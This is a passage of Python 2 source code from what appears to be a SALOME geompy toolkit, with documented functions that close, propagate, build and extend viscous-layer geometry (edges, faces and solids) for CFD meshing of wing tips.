                outside_vertexes.append(wire_vertex)
        #-
        # Get the closing direction
        if face == None:# If no face is given by the user...
            # Close the wire
            closing_edge = geompy.MakeEdge(outside_vertexes[0], outside_vertexes[1])
            closed_contour = geompy.MakeWire([wire[-1], closing_edge])
            #-
            if plane == None:# And if no plane is given by the user...
                if abs(geompy.BasicProperties(closing_edge)[0] - geompy.BasicProperties(wire[-1])[0]) < tol:# If the input wire is straight...
                    # Use the OXY plane
                    plane = geompy.MakeFaceHW(10, 10, 1)
                    #-
                else:
                    # Get the wire plane
                    plane = geompy.MakeFace(closed_contour, True)
                    #-
            # Get the plane normal
            normal = geompy.GetNormal(plane)
            #-
            # Extrude the closing edge
            face = geompy.MakePrismVecH(closing_edge, normal, 0.1)
            #-
        normal_vector = geompy.GetNormal(face)
        #-
        # Create the inside vertex compound
        inside_vertex_compound = geompy.MakeCompound(inside_vertexes)
        #-
        # Get the external edges
        # (an edge touching exactly one junction vertex is an outer edge)
        external_edges = []
        for edge in wire[1]:
            nb_contacts = 0
            for inside_vertex in inside_vertexes:
                min_distance = geompy.MinDistance(inside_vertex, edge)
                if min_distance == 0:
                    nb_contacts += 1
            if nb_contacts == 1:
                external_edges.append(edge)
        #-
        # Calculate the closing thickness
        # ("auto" = half the mean external edge length)
        if dist == "auto":
            total_external_edge_length = 0
            for external_edge in external_edges:
                total_external_edge_length += geompy.BasicProperties(external_edge)[0]
            dist = total_external_edge_length / 2
        if rev == True:
            dist *= -1.0
        #-
        output_edges = []
        # Close the external edges
        translated_inside_vertexes = []
        for external_edge in external_edges:# For each external edge...
            external_edge_vertexes = geompy.SubShapeAll(external_edge, geompy.ShapeType["VERTEX"])
            # Sort the vertexes
            external_edge_inside_vertex = None
            external_edge_outide_vertex = None
            for external_edge_vertex in external_edge_vertexes:
                min_distance = geompy.MinDistance(external_edge_vertex, inside_vertex_compound)
                if min_distance == 0:
                    external_edge_inside_vertex = external_edge_vertex
                else:
                    external_edge_outide_vertex = external_edge_vertex
            #-
            # Translate the inside vertex
            translated_inside_vertex = geompy.MakeTranslationVectorDistance(external_edge_inside_vertex, normal_vector, dist)
            translated_inside_vertexes.append(translated_inside_vertex)
            #-
            # Create the closing edges
            # NOTE(review): a style value other than "straight" or "smooth" leaves
            # outside_closing_edge unbound (NameError) — confirm the allowed values
            # are validated upstream.
            if style == "straight":
                outside_closing_edge = geompy.MakeEdge(external_edge_outide_vertex, translated_inside_vertex)
            elif style == "smooth":
                outside_closing_edge = geompy.MakeArcOfEllipse(external_edge_inside_vertex, external_edge_outide_vertex, translated_inside_vertex)
            inside_closing_edge = geompy.MakeEdge(external_edge_inside_vertex, translated_inside_vertex)
            #-
            output_edges.append(outside_closing_edge)
            output_edges.append(inside_closing_edge)
        if len(wire[1]) == 3:# If there are three edges in the input wire...
            # Close the closing
            closing_closing_edge = geompy.MakeEdge(translated_inside_vertexes[0], translated_inside_vertexes[1])
            output_edges.append(closing_closing_edge)
            #-
        if len(wire[1]) == 2:# If there are two edges in the input wire...
            # Create the output edge compound
            output_edge_compound = geompy.MakeCompound(output_edges)
            #-
            # Glue the edges (both loops produced a coincident inside closing edge)
            glued_output_edge_compound = geompy.MakeGlueEdges(output_edge_compound, tol)
            #-
            # Explode the glued compound
            output_edges = geompy.SubShapeAll(glued_output_edge_compound, geompy.ShapeType["EDGE"])
            #-
        if dim == 1:
            # Put the output edges into a compound
            output_edges = geompy.MakeCompound(output_edges)
            #-
            to_return = output_edges
            to_return_name = "ViscousLayerClosing"
        else:
            face = geompy.MakeFaceWires(external_edges[0:1] + output_edges[0:2], isPlanarWanted = True)
            faces = [face]
            if len(wire[1]) == 3:# If there are three edges in the input wire...
                face = geompy.MakeFaceWires(external_edges[1:2] + output_edges[2:4], isPlanarWanted = True)
                faces.append(face)
                face = geompy.MakeQuad2Edges(output_edges[1], output_edges[3])
                faces.append(face)
            if len(wire[1]) == 2:# If there are two edges in the input wire...
                face = geompy.MakeFaceWires(external_edges[1:2] + output_edges[1:3], isPlanarWanted = True)
                faces.append(face)
            # Put the output faces into a shell
            shell = geompy.MakeShell(faces)
            #-
            to_return = shell
            to_return_name = "ViscousLayerClosing (Faces)"
        # Add and return the resulting shape(s)
        if add == True:
            AddToStudy(to_return, to_return_name, father)
        return to_return
#-
# Short alias for CloseViscousLayer (interactive console convenience).
cvl = CloseViscousLayer
def PropagateViscousLayerIntersection( compound = None, dir = "auto", tol = 1e-7, add = True, infa = False ):
    """
    Description:
        Propagates the intersection into two intersecting viscous layers.
    Arguments:
        # compound
            Description: The source compound of edges.
            Type: Compound of Edges
            GUI selection: yes
            Selection by name: yes
            Recursive: yes
            Default value: None
        # dir
            Description: Equals "x", "y" or "z" to impose the approximate direction of the propagation, "auto" to let the function decide by itself. (Used to sort intersection vertexes.)
            Type: String
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: "auto"
        # tol
            Description: See here.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1e-7
        # add
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # infa
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
    Returned Values:
        "dim" value: -
        "single" value: -
        Type: Compound of Edges
        Number: 1
        Name: "PropagatedIntersection"
    Conditions of use:
        The source compound has to be planar and must contain only "parallel" edges (in the "blocking" sense).
    """
    # Get the input shape(s)
    compound = GetGUISelection(compound)
    compound = GetObject(compound)
    #-
    # Make this function recursive
    if isinstance(compound, list):
        return_list = []
        for sub_object in compound:
            return_list.append(PropagateViscousLayerIntersection(sub_object, dir, tol, add, infa))
        return return_list
    #-
    # Check the input shape existence
    if "error" in [compound] or None in [compound]: return
    #-
    # Set father object
    father = None
    if infa == True: father = compound
    #-
    if False: pass
    else:# All checks done
        # Get the sub-shapes
        compound = GetSubShapes(compound)
        #-
        # Get the intersection vertexes
        # (a partition vertex coinciding with no original compound vertex was
        # necessarily created by an edge/edge intersection)
        partition = geompy.MakePartition([compound[-1]], Limit = geompy.ShapeType["VERTEX"])
        partition_vertexes = geompy.SubShapeAll(partition, geompy.ShapeType["VERTEX"])
        intersection_vertexes = []
        for partition_vertex in partition_vertexes:
            is_intersection_vertex = True
            for compound_vertex in compound[0]:
                distance = geompy.MinDistance(partition_vertex, compound_vertex)
                if distance == 0:
                    is_intersection_vertex = False
            if is_intersection_vertex == True:
                intersection_vertexes.append(partition_vertex)
        #-
        # Get the compound plane
        quadrangle_face = geompy.MakeQuad2Edges(compound[1][0], compound[1][1])
        #-
        # Get the compound plane normal
        compound_plane_normal = geompy.GetNormal(quadrangle_face)
        #-
        # Extrude compound edges (so intersection vertexes can be projected on them)
        compound_edge_extensions = []
        for compound_edge in compound[1]:
            compound_edge_extension = geompy.MakePrismVecH(compound_edge, compound_plane_normal, 0.1)
            compound_edge_extensions.append(compound_edge_extension)
        #-
        # Get the dimension used to sort the intermediate vertexes
        sorting_dimension = 0# Safe default, avoids a NameError on an unexpected "dir" value
        if dir == "x":
            sorting_dimension = 0
        elif dir == "y":
            sorting_dimension = 1
        elif dir == "z":
            sorting_dimension = 2
        #-
        # Create intermediate edges
        intermediate_edges = []
        for intersection_vertex in intersection_vertexes:# For each intersection vertex...
            # Project intersection vertex on extruded edges
            projected_vertexes = []
            for compound_edge_extension in compound_edge_extensions:
                projected_vertex = geompy.MakeProjection(intersection_vertex, compound_edge_extension)
                projected_vertexes.append(projected_vertex)
            #-
            # Get the number of projected vertexes
            nb_projected_vertexes = len(projected_vertexes)
            #-
            # Get the sorting dimension if "auto" enabled
            # (the dominant extent of the projected vertex bounding box)
            if dir == "auto":
                projected_vertex_compound = geompy.MakeCompound(projected_vertexes)
                bounding_box = geompy.BoundingBox(projected_vertex_compound)
                # geompy.BoundingBox returns [Xmin, Xmax, Ymin, Ymax, Zmin, Zmax]:
                # each extent is the difference of the matching min/max pair.
                dx = abs(bounding_box[1] - bounding_box[0])
                dy = abs(bounding_box[3] - bounding_box[2])
                dz = abs(bounding_box[5] - bounding_box[4])
                if max(dx, dy, dz) == dx:
                    sorting_dimension = 0
                elif max(dx, dy, dz) == dy:
                    sorting_dimension = 1
                elif max(dx, dy, dz) == dz:
                    sorting_dimension = 2
            #-
            # Reorder projected vertexes (selection sort on the coordinate along
            # the sorting dimension)
            reorder_projected_vertexes = []
            resting_vertexes = projected_vertexes[:]
            next_vertex_index = 0
            for i in range(nb_projected_vertexes):# Each time they are projected vertex left...
                vertex_index = 0
                min_position = 1e99
                for resting_vertex in resting_vertexes:
                    resting_vertex_position = geompy.PointCoordinates(resting_vertex)[sorting_dimension]
                    if resting_vertex_position < min_position:
                        next_vertex_index = vertex_index
                        min_position = resting_vertex_position
                    vertex_index += 1
                next_vertex = resting_vertexes[next_vertex_index]
                reorder_projected_vertexes.append(next_vertex)
                del resting_vertexes[next_vertex_index]
            #-
            # Create intermediate edges between consecutive projected vertexes,
            # skipping degenerate (zero-length) ones
            for reordered_vertex_index in range(nb_projected_vertexes - 1):
                first_intermediate_edge_vertex = reorder_projected_vertexes[reordered_vertex_index]
                second_intermediate_edge_vertex = reorder_projected_vertexes[reordered_vertex_index + 1]
                distance = geompy.MinDistance(first_intermediate_edge_vertex, second_intermediate_edge_vertex)
                if distance > tol:
                    intermediate_edge = geompy.MakeEdge(first_intermediate_edge_vertex, second_intermediate_edge_vertex)
                    intermediate_edges.append(intermediate_edge)
            #-
        #-
        # Partition the whole geometry
        edges = compound[1] + intermediate_edges
        partition = geompy.MakePartition(edges)
        #-
        # Add and return the resulting shape(s)
        if add == True:
            AddToStudy(partition, "PropagatedIntersection", father)
        return partition
#-
# Short alias for PropagateViscousLayerIntersection (interactive console convenience).
pvli = PropagateViscousLayerIntersection
def MakeTipViscousLayer( dist, offset, foil = None, style = "smooth", np = 60, curv = True, tol = 1e-4, by_param = False, rev = False, add = True, infa = False, dim = 3 ):
    """
    Description:
        Creates a tip viscous layer volume following a foil edge.
    Arguments:
        # dist
            Description: The offset distance normal to the wing tip.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: -
        # offset
            Description: The edge describing the offset of the viscous layer in the wing tip plane.
            Type: Edge
            GUI selection: -
            Selection by name: yes
            Recursive: -
            Default value: -
        # foil
            Description: The edge touching the wing tip.
            Type: Edge
            GUI selection: yes
            Selection by name: yes
            Recursive: -
            Default value: None
        # style
            Description: See here.
            Type: String
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: "smooth"
        # np
            Description: See here.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 60
        # curv
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # tol
            Description: See here.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1e-4
        # by_param
            Description: Defines if the function has to create two points at the same position on the foil edge and on the offset edge respectively by using a same distance from the edge start (True) or the same parameter on the edge (False). In some cases, switch this parameter can give better results.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # rev
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # add
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # infa
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # dim
            Description: See here.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 3
    Returned Values:
        "dim" value: 1
        "single" value: -
        Type: Compound of Edges
        Number: 2
        Name: "TipViscousLayer (Edges)"
        "dim" value: 2
        "single" value: -
        Type: Compound of Faces
        Number: 1
        Name: "TipViscousLayer (Faces)"
        "dim" value: 3
        "single" value: -
        Type: Solid
        Number: 1
        Name: "TipViscousLayer"
    Conditions of use:
        The input edges have to be open.
    """
    if dim == 0: print "[X] There is no shape to return corresponding to the given dimension."; return
    # Get the input shape(s)
    foil = GetGUISelection(foil, uniq = True)
    [foil, offset] = GetObject([foil, offset])
    #-
    # Check the input shape existence
    if "error" in [foil, offset] or None in [foil, offset]: return
    #-
    # Set father object
    father = None
    if infa == True: father = foil
    #-
    if False: pass
    else:# All checks done
        # Get the sub-shapes
        [foil, offset] = GetSubShapes([foil, offset])
        #-
        # Get the edge lengths
        foil_length = geompy.BasicProperties(foil[-1])[0]
        offset_length = geompy.BasicProperties(offset[-1])[0]
        #-
        # Get the offset edge sense
        # (if the foil start is closer to the offset end than to the offset start,
        # the two edges run in opposite directions)
        linking_edge_1 = geompy.MakeEdge(foil[0][0], offset[0][0])
        linking_edge_2 = geompy.MakeEdge(foil[0][0], offset[0][1])
        linking_edge_1_length = geompy.BasicProperties(linking_edge_1)[0]
        linking_edge_2_length = geompy.BasicProperties(linking_edge_2)[0]
        reverse_length = False
        if linking_edge_1_length > linking_edge_2_length:
            reverse_length = True
        #-
        # Get the foil normal vector
        face = geompy.MakeQuad2Edges(foil[-1], offset[-1])
        normal_vector = geompy.GetNormal(face)
        #-
        filling_edges_3d = []
        filling_edges_2d = []
        boundary_faces = []
        if rev == True:
            dist *= -1.0
        if curv == True:
            parameter_list = DiscretizeEdgeByCurvature(foil[-1], np, dim = -1)
        else:
            parameter_list = [n / float(np) for n in range(np + 1)]
        #-
        # Create the offset vertexes
        for parameter in parameter_list:# For each position on the foil edge...
        #for parameter in [1 - n / float(np - 1) for n in range(np)]:# For each position on the foil edge...
            # Create the vertexes
            if by_param == True:
                foil_vertex = geompy.MakeVertexOnCurve(foil[-1], parameter)
            else:
                foil_vertex = geompy.MakeVertexOnCurveByLength(foil[-1], parameter * foil_length, foil[0][0])
            # Walk the offset edge backwards when it is oriented opposite to the foil edge
            if reverse_length == True:
                parameter = 1.0 - parameter
            if by_param == True:
                offset_vertex = geompy.MakeVertexOnCurve(offset[-1], parameter)
            else:
                offset_vertex = geompy.MakeVertexOnCurveByLength(offset[-1], parameter * offset_length, offset[0][0])
            translated_vertex = geompy.MakeTranslationVectorDistance(foil_vertex, normal_vector, dist)
            #-
            # Create the 2D filling edge
            filling_edge_2d = geompy.MakeEdge(foil_vertex, offset_vertex)
            filling_edges_2d.append(filling_edge_2d)
            #-
            # Create the 3D filling edge
            if style == "smooth":
                filling_edge_3d = geompy.MakeArcOfEllipse(foil_vertex, offset_vertex, translated_vertex)
                filling_edges_3d.append(filling_edge_3d)
            else:
                filling_edge_3d = geompy.MakeEdge(offset_vertex, translated_vertex)
                filling_edges_3d.append(filling_edge_3d)
            #-
            if dim >= 2:
                # parameter equals 0 or 1 only at the two ends of the foil edge
                # (the reverse_length flip maps 0 <-> 1, still an end position)
                if parameter == 0 or parameter == 1:# If it is the first or the last position...
                    # Create the boundary face
                    third_edge = geompy.MakeEdge(foil_vertex, translated_vertex)
                    boundary_faces.append(geompy.MakeFaceWires([filling_edge_3d, filling_edge_2d, third_edge], True))
            #-
        # Put the filling edges into compounds
        filling_edge_compound_2d = geompy.MakeCompound(filling_edges_2d)
        filling_edge_compound_3d = geompy.MakeCompound(filling_edges_3d)
        #-
        # Add and return the resulting shape(s)
        if dim == 1:
            if add == True:
                AddToStudy(filling_edge_compound_2d, "TipViscousLayer (Edges)", father)
                AddToStudy(filling_edge_compound_3d, "TipViscousLayer (Edges)", father)
            return [filling_edge_compound_2d, filling_edge_compound_3d]
            #-
        else:
            # Create the fillings
            filling_2d = geompy.MakeFilling(filling_edge_compound_2d, theMinDeg = 15, theMaxDeg = 20, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
            filling_3d = geompy.MakeFilling(filling_edge_compound_3d, theMinDeg = 15, theMaxDeg = 20, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect)
            #-
            # Extrude the foil edge
            foil_extension = geompy.MakePrismVecH(foil[-1], normal_vector, dist)
            #-
            # Create the compound from faces
            face_compound = geompy.MakeCompound([filling_2d, filling_3d, foil_extension, boundary_faces[0], boundary_faces[1]])
            #-
            # Add and return the resulting shape(s)
            if dim == 2:
                if add == True:
                    AddToStudy(face_compound, "TipViscousLayer (Faces)", father)
                return face_compound
                #-
            else:
                # Glue the edges, doubling the tolerance until no free boundary remains
                # NOTE(review): this loop does not terminate if gluing never closes the
                # shell — confirm whether an upper bound on the tolerance is needed.
                gluing_tolerance = tol
                while True:
                    free_boundaries = geompy.GetFreeBoundary(face_compound)[1]
                    if len(free_boundaries) == 0:
                        break
                    face_compound = geompy.MakeGlueEdges(face_compound, gluing_tolerance)
                    gluing_tolerance *= 2
                #-
                # Create the shell form the compound
                shell = geompy.MakeShell([face_compound])
                #-
                # Create the solid from the shell
                solid = geompy.MakeSolid([shell])
                #-
                # Add and return the resulting shape(s)
                if add == True:
                    AddToStudy(solid, "TipViscousLayer", father)
                return solid
#-
# Short alias for MakeTipViscousLayer (interactive console convenience).
mtvl = MakeTipViscousLayer
def ExtendTipViscousLayer( shell_and_compound = [None], np = 40, tol = 1e-7, add = True, infa = False, dim = 3 ):
	"""
	Description:
		Extends a tip viscous layer.
	Arguments:
		# shell_and_compound
			Description: the input shell to extend and its guiding edge compound.
			Type: List of 1 Shell + 1 Compound of Edges
			GUI selection: yes
			Selection by name: yes
			Recursive: -
			Default value: [None]
		# np
			Description: See here.
			Type: Integer
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: 40
		# tol
			Description: See here.
			Type: Float
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: 1e-7
		# add
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: True
		# infa
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: False
		# dim
			Description: See here.
			Type: Integer
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: 3
	Returned Values:
		"dim" value: 1
		"single" value: -
		Type: Compound of Edges
		Number: 5 or 8
		Name: "TipViscousLayerExtension (Edges)"
		"dim" value: 2
		"single" value: -
		Type: Compound of Faces
		Number: 2 or 3
		Name: "TipViscousLayerExtension (Faces)"
		"dim" value: 3
		"single" value: -
		Type: Compound of Solids
		Number: 1
		Name: "TipViscousLayerExtension"
	Conditions of use:
		The input shell has to contain 2 faces having the shape of triangles or ellipse quarters and an optional middle face being a quadrangle. The edge compound has to have all the characteristics of a compound build with the ExtendViscousLayer function.
	"""
	if isinstance(shell_and_compound, list) == False: print "[X] The first argument (shell_and_compound) should be an array."; return
	if isinstance(np, str): print "[X] The second argument (np) should be an integer ."; return
	if dim == 0: print "[X] There is no shape to return corresponding to the given dimension."; return
	# Get the input shape(s)
	shell_and_compound = GetGUISelection(shell_and_compound)
	shell_and_compound = GetObject(shell_and_compound)
	#-
	# Check the input shape existence
	if "error" in shell_and_compound or None in shell_and_compound: return
	#-
	# Check the number of selected objects
	if len(shell_and_compound) != 2:
		print "[X] Two objects should be selected."
		return
	#-
	# Distinguish input shapes
	# The object containing faces is the shell; the other one is the guiding edge compound.
	shell = None
	compound = None
	for object in shell_and_compound:
		nb_faces = geompy.NumberOfFaces(object)
		if nb_faces > 0:
			shell = object
		else:
			compound = object
	#-
	# Set father object
	father = None
	if infa == True: father = compound
	#-
	if False: pass
	else:# All checks done
		# Check if the input shape is "shell-shaped"
		shell_faces = GetSubShapes(shell)[2]
		try:
			shell = geompy.MakeShell(shell_faces)
		except:
			print "[X] The input 2D shape should be \"shell-shaped\"."; return
		#-
		# Keep edges touching the input shell
		# An edge is kept only when exactly one of its two endpoints lies on the shell
		# (min distance within tol, max distance beyond tol): these are the guiding rails.
		compound_edges = GetSubShapes(compound)[1]
		edges_to_keep = []
		for edge in compound_edges:
			edge_vertexes = GetSubShapes(edge)[0]
			distance_1 = geompy.MinDistance(edge_vertexes[0], shell)
			distance_2 = geompy.MinDistance(edge_vertexes[1], shell)
			distances = [distance_1, distance_2]
			if min(distances) <= tol and max(distances) > tol:
				edges_to_keep.append(edge)
		compound = geompy.MakeCompound(edges_to_keep)
		#-
		# Get the sub - geometries
		# From here on, shell/compound are lists of sub-shapes: [0]=vertexes, [1]=edges,
		# [2]=faces, [-1]=the shape itself (inferred from usage below — confirm against GetSubShapes).
		[shell, compound] = GetSubShapes([shell, compound])
		#-
		# Get the normal direction
		compound_vertex_compound = geompy.MakeCompound(compound[0])
		shell_vertex_compound = geompy.MakeCompound(shell[0])
		top_vertex_compound = geompy.MakeCut(shell_vertex_compound, compound_vertex_compound)
		# NOTE(review): top_vertex_compound is computed but never used below;
		# top_vertex is located by the loop instead.
		top_vertex = None
		for vertex in shell[0]:
			distance = geompy.MinDistance(vertex, compound[-1])
			if distance > tol:
				top_vertex = vertex
				break
		bottom_vertex = geompy.GetShapesNearPoint(compound[-1], top_vertex, geompy.ShapeType["VERTEX"])
		normal = geompy.MakeVector(bottom_vertex, top_vertex)
		#-
		# Get root normal thickness
		root_normal_thickness = geompy.BasicProperties(normal)[0]
		#-
		# Distinguish inside and outside edges
		# Classification rule: a compound edge whose shell-touching vertex contacts exactly
		# one shell face lies on the outer rim; a vertex shared by several faces is inside.
		inside_edges = []
		outside_edges = []
		for edge in compound[1]:
			edge_vertexes = geompy.SubShapeAll(edge, geompy.ShapeType["VERTEX"])
			for edge_vertex in edge_vertexes:
				min_distance = geompy.MinDistance(edge_vertex, shell[-1])
				if min_distance <= tol:
					nb_contacts = 0
					for face in shell[2]:
						min_distance = geompy.MinDistance(edge_vertex, face)
						if min_distance <= tol:
							nb_contacts += 1
					if nb_contacts == 1:
						outside_edges.append(edge)
					else:
						inside_edges.append(edge)
					break
		#-
		# Get local thickness
		# Sample np points along each inside/outside edge pair and measure their distance.
		inside_edge_compound = geompy.MakeCompound(inside_edges)
		local_thickness_lists = []
		for outside_edge in outside_edges:
			some_outside_edge_vertex = GetSubShapes(outside_edge)[0][0]
			inside_edge = geompy.GetShapesNearPoint(inside_edge_compound, some_outside_edge_vertex, geompy.ShapeType["EDGE"])
			edge_1 = inside_edge
			edge_2 = outside_edge
			length_1 = geompy.BasicProperties(edge_1)[0]
			length_2 = geompy.BasicProperties(edge_2)[0]
			[x, y, z] = geompy.ClosestPoints(edge_1, shell[-1])[1][0:3]
			first_vertex_1 = geompy.MakeVertex(x, y, z)
			[x, y, z] = geompy.ClosestPoints(edge_2, shell[-1])[1][0:3]
			first_vertex_2 = geompy.MakeVertex(x, y, z)
			local_thicknesses = []
			for parameter in [n / float(np - 1) for n in range(np)]:
				vertex_1 = geompy.MakeVertexOnCurveByLength(edge_1, parameter * length_1, first_vertex_1)
				vertex_2 = geompy.MakeVertexOnCurveByLength(edge_2, parameter * length_2, first_vertex_2)
				local_thickness = geompy.MinDistance(vertex_1, vertex_2)
				local_thicknesses.append(local_thickness)
			local_thickness_lists.append(local_thicknesses)
		# Average the two sampled thickness profiles, then rescale so the first sample
		# matches the root normal thickness.
		nb_local_thicknesses = len(local_thickness_lists[0])
		final_local_thicknesses = []
		for i in range(nb_local_thicknesses):
			final_local_thickness = (local_thickness_lists[0][i] + local_thickness_lists[1][i]) / 2.0
			final_local_thicknesses.append(final_local_thickness)
		normal_thickness_scale = root_normal_thickness / final_local_thicknesses[0]
		for i in range(nb_local_thicknesses):
			final_local_thicknesses[i] = final_local_thicknesses[i] * normal_thickness_scale
		#-
		# Create the missing outside edges
		# Each missing outside edge is interpolated through points offset from the inside
		# edge along the normal by the local thickness.
		missing_outside_edges = []
		for inside_edge in inside_edges:
			edge_1 = inside_edge
			length_1 = geompy.BasicProperties(edge_1)[0]
			[x, y, z] = geompy.ClosestPoints(edge_1, shell[-1])[1][0:3]
			first_vertex_1 = geompy.MakeVertex(x, y, z)
			outside_missing_edge_vertexes = []
			i = 0
			for parameter in [n / float(np - 1) for n in range(np)]:
				vertex_1 = geompy.MakeVertexOnCurveByLength(edge_1, parameter * length_1, first_vertex_1)
				vertex_2 = geompy.MakeTranslationVectorDistance(vertex_1, normal, final_local_thicknesses[i])
				outside_missing_edge_vertexes.append(vertex_2)
				i += 1
			missing_outside_edge = geompy.MakeInterpol(outside_missing_edge_vertexes)
			missing_outside_edges.append(missing_outside_edge)
		# Add the missing outside edges to the edge list
		path_edges = compound[1] + missing_outside_edges
		#-
		# Create the fillings
		shell_edges = geompy.SubShapeAll(shell[-1], geompy.ShapeType["EDGE"])
		fillings = []
		filling_edge_compounds = []
		i = 0
		for shell_edge in shell_edges:# For each edge of the face compound...
			# Get the edge style
			# An edge whose length equals its endpoint chord (within tol) is straight;
			# otherwise it is treated as a smooth curve.
			shell_edge_length = geompy.BasicProperties(shell_edge)[0]
			shell_edge_vertexes = geompy.SubShapeAll(shell_edge, geompy.ShapeType["VERTEX"])
			rebuilt_straight_edge = geompy.MakeEdge(shell_edge_vertexes[0], shell_edge_vertexes[1])
			rebuilt_straight_edge_length = geompy.BasicProperties(rebuilt_straight_edge)[0]
			if abs(shell_edge_length - rebuilt_straight_edge_length) <= tol:
				style = "straight"
			else:
				style = "smooth"
			#-
			# Get the path edges
			edge_path_edges = []
			for path_edge in path_edges:
				min_distance = geompy.MinDistance(path_edge, shell_edge)
				if min_distance <= tol:
					edge_path_edges.append(path_edge)
			#-
			# Get the center edge
			if style == "smooth":
				# Get the adjacent edges
				shell_edge_adjacent_edges = []
				other_face_compound_edges = list(shell_edges)
				del other_face_compound_edges[i]
				for other_face_compound_edge in other_face_compound_edges:
					min_distance = geompy.MinDistance(other_face_compound_edge, shell_edge)
					if min_distance <= tol:
						shell_edge_adjacent_edges.append(other_face_compound_edge)
				#-
				# Put them in a compound
				shell_edge_adjacent_edge_compound = geompy.MakeCompound(shell_edge_adjacent_edges)
				#-
				# Get the center edge
				center_edge = None
				for inside_edge in inside_edges:
					min_distance = geompy.MinDistance(inside_edge, shell_edge_adjacent_edge_compound)
					if min_distance <= tol:
						center_edge = inside_edge
						break
				#-
			#-
			# Get the edge lengths
			length_1 = geompy.BasicProperties(edge_path_edges[0])[0]
			length_2 = geompy.BasicProperties(edge_path_edges[1])[0]
			#-
			# Get the edge vertexes
			edge_path_edge_1_vertexes = geompy.SubShapeAll(edge_path_edges[0], geompy.ShapeType["VERTEX"])
			first_vertex_1 = edge_path_edge_1_vertexes[0]
			last_vertex_1 = edge_path_edge_1_vertexes[1]
			edge_path_edge_2_vertexes = geompy.SubShapeAll(edge_path_edges[1], geompy.ShapeType["VERTEX"])
			first_vertex_2 = edge_path_edge_2_vertexes[0]
			last_vertex_2 = edge_path_edge_2_vertexes[1]
			# Get the offset edge sense
			# If first_vertex_1 is closer to last_vertex_2 than to first_vertex_2, edge 2 must be
			# walked in reverse so both path edges are sampled in the same direction.
			linking_edge_1 = geompy.MakeEdge(first_vertex_1, first_vertex_2)
			linking_edge_2 = geompy.MakeEdge(first_vertex_1, last_vertex_2)
			linking_edge_1_length = geompy.BasicProperties(linking_edge_1)[0]
			linking_edge_2_length = geompy.BasicProperties(linking_edge_2)[0]
			reverse_length = False
			if linking_edge_1_length > linking_edge_2_length:
				reverse_length = True
			#-
			# Create the filling edges
			filling_edges = []
			#for parameter in [1 - n / float(np - 1) for n in range(np)]:
			for parameter in [n / float(np - 1) for n in range(np)]:
				# Create the vertexes
				vertex_1 = geompy.MakeVertexOnCurveByLength(edge_path_edges[0], parameter * length_1, first_vertex_1)
				if reverse_length == True:
					parameter = 1.0 - parameter
				vertex_2 = geompy.MakeVertexOnCurveByLength(edge_path_edges[1], parameter * length_2, first_vertex_2)
				if style == "smooth":
					length_0 = geompy.BasicProperties(center_edge)[0]
					first_vertex_0 = geompy.SubShapeAll(center_edge, geompy.ShapeType["VERTEX"])[0]
					vertex_0 = geompy.MakeVertexOnCurveByLength(center_edge, parameter * length_0, first_vertex_0)
				#-
				# Create the filling edge
				if style == "straight":
					filling_edge = geompy.MakeEdge(vertex_1, vertex_2)
				elif style == "smooth":
					filling_edge = geompy.MakeArcOfEllipse(vertex_0, vertex_1, vertex_2)
				#-
				# Create the filling edge compound
				filling_edges.append(filling_edge)
			#-
			# Create the filling edge compound
			filling_edge_compound = geompy.MakeCompound(filling_edges)
			filling_edge_compounds.append(filling_edge_compound)
			#-
			# Create the filling
			fillings.append(geompy.MakeFilling(filling_edge_compound, theMinDeg = 15, theMaxDeg = 20, theTol2D = 1e-5, theTol3D = 1e-5, theMethod = GEOM.FOM_AutoCorrect))
			#-
		#-
		# Add and return the resulting shape(s)
		if dim == 1:
			if add == True:
				AddToStudy(filling_edge_compounds, "TipViscousLayerExtension (Edges)", father)
			return filling_edge_compounds
		#-
		else:
			# Create the filling shells
			filling_shells = []
			for face in shell[2]:# For each face of the input compound...
				# Get the fillings
				# A filling touching the face at exactly 2 of its vertexes borders that face.
				face_fillings = []
				for filling in fillings:
					filling_vertexes = geompy.SubShapeAll(filling, geompy.ShapeType["VERTEX"])
					nb_contacts = 0
					for filling_vertex in filling_vertexes:
						min_distance = geompy.MinDistance(filling_vertex, face)
						if min_distance <= tol:
							nb_contacts += 1
					if nb_contacts == 2:
						face_fillings.append(filling)
				#-
				# Create the filling shell
				filling_shells.append(geompy.MakeShell(face_fillings + [face]))
			#-
			#-
			# Add and return the resulting shape(s)
			if dim == 2:
				if add == True:
					AddToStudy(filling_shells, "TipViscousLayerExtension (Faces)", father)
				return filling_shells
			#-
			else:
				# Create the solids
				solids = []
				for filling_shell in filling_shells:
					# Glue the edges
					# Glue with a doubling tolerance until the only remaining free boundary
					# is planar (checked via a plane through three of its nodes): that rim
					# is the hole capped just below.
					gluing_tolerance = tol * 1e2
					while True:
						free_boundaries = geompy.GetFreeBoundary(filling_shell)[1]
						if len(free_boundaries) == 1:
							free_boundary = free_boundaries[0]
							free_boundary_length = geompy.BasicProperties(free_boundary)[0]
